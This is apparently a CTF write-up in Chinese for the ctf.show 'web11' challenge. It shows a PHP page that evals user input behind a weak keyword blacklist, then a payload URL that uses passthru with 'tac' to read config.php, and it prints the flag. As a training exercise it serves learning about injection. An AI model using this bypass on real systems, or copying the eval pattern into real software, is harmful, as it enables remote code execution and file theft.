web11

1
阿呆听完自己菜死了，自己呆了。决定修好漏洞，绝对不能让自己再菜死了。

---

解法

可知 flag 在 config.php。

<?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){
        $c = $_GET['c'];
        if(!preg_match("/system|exec|highlight|cat/i",$c)){
                eval($c);
        }else{
            die("cmd error");
        }
}else{
        highlight_file(__FILE__);
}
?>

cat 会被拦截，那就用 tac，从尾到头显示文件内容。发送 GET 请求：

https://9df70e10-e53e-4962-add7-44ac09411ff5.challenge.ctf.show/?c=passthru("tac config.php");

取得 flag。

Flag

ctfshow{35fa4ab2-411b-42b1-9e45-66aa5138c836}